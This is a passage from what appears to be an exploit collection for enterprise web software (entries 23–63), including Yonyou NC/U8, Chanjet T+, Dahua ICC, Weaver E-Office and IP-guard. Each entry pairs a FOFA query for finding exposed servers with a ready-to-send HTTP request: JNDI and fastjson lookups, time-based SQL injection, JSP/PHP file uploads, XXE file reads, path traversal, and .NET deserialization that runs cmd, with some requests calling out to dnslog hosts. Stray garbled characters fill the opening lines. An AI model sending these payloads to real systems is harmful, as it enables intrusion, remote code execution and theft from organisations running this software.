) H* M, V/ @5 ^- x1 r" W* X0 p; w+ m2 p% Q) y$ f
{
8 R  n! G* r1 @: u5 w! ^9 T"loginName":"${jndi:ldap://dnslog}"
0 w" g: Z6 _$ v$ f3 m5 ?}5 ]3 A$ }, k0 P' g9 l8 o

8 }/ ~6 N: m0 g& }! x1 h0 u  k0 |% [& n) Z" Z
' B: r9 I# D5 o6 R
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
- w- v( Y" ^8 ?0 \! `  u& _FOFA:icon_hash="-1935899595"
) O4 X+ s# {6 a' E0 P" f$ CPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! O2 \# n6 V! \5 F0 \4 PHost: your-ip9 s$ G3 ~( H: N# y1 O; i( w1 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 S7 c+ q2 A) ]
Content-Type: application/json;charset=utf-8) D" E; b& w* h1 F
Accept-Encoding: gzip
% D1 ?% I8 Y& ?8 s4 ~, |Connection: close
7 @  A& E( O$ U
8 @. j+ H4 ?& {  d/ a7 K& Y- ~, X{; V3 \7 A! r, ^( ?2 I' U
    "a":{
4 `2 e% z& r4 m' g3 l        "@type":"com.alibaba.fastjson.JSONObject",, T/ {# d( {' t3 q- F
       {"@type":"java.net.URL","val":"http://DNSLOG"}
6 g5 P- q# w5 d( m, [0 j        }"") L3 B9 \5 O3 k) H& W
}
- h3 H: a; t  @* d9 d
; O  T6 a7 b8 u& m1 V% u
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--


25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--


/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD


http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong (云时空) Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"


Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}


Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
The sql parameter is base64 (c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3) and the exportexcelbysql action executes the decoded statement as-is.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zhejiang University Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
The raw request body is written verbatim under the name given in filename; the check below writes a plain marker rather than a JSP.
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
The page parameter reaches a shell unescaped; the request writes a marker file next to view.php, and the second request fetches it.
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the marker:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

